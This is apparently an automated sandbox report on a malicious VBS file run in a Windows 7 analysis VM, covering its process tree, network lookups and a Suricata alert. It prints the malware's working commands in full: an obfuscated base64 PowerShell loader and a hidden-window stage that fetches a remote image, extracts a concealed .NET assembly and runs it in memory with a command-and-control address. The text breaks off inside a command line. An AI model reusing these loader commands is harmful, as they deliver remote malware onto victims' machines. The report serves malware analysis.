Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Dec. 8, 2023, 9:39 a.m. | Dec. 8, 2023, 9:41 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\MicrosoftHealthcheck.vbs
416-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2076-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) | . ( $EnV:CoMsPeC[4,24,25]-jOiN'')"
2200
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.32.56.80 |
uploaddeimagens.com.br | 104.21.45.138 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 104.21.45.138:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49166 104.21.45.138:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=uploaddeimagens.com.br | d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71 |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -command "$Codigo = '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